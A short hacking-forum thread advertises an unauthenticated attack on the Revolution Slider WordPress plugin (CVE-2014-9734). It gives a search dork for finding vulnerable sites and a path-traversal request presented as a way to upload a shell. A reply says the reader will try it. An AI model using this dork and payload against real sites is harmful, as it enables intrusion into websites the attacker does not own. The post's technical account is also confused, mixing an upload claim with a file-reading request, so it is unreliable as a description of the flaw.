RevSlider Arbitrary File Upload (CVE-2014-9734) New Argument
by godofserver - 20-06-25, 02:10 PM
#1
  • πŸ›  Plugin: Revolution Slider <= 4.2
  • 🎯 Impact: Full RCE via
    Code:
    upload.php
  • πŸ”“ No login required
  • πŸ” Dork:

    Β text
    CopyEdit
    Code:
    inurl:/wp-content/plugins/revslider/
  • πŸ’₯ Payload:
    Upload shell via:
    Code:
    /wp-admin/admin-ajax.php?action=revslider_show_image&img=../shell.php
Reply
#2
Remember the old RevSlider wave, so fkin creepy. Gonna try this one, thx bruh
Reply


Forum Jump:


 Users browsing this thread: 1 Guest(s)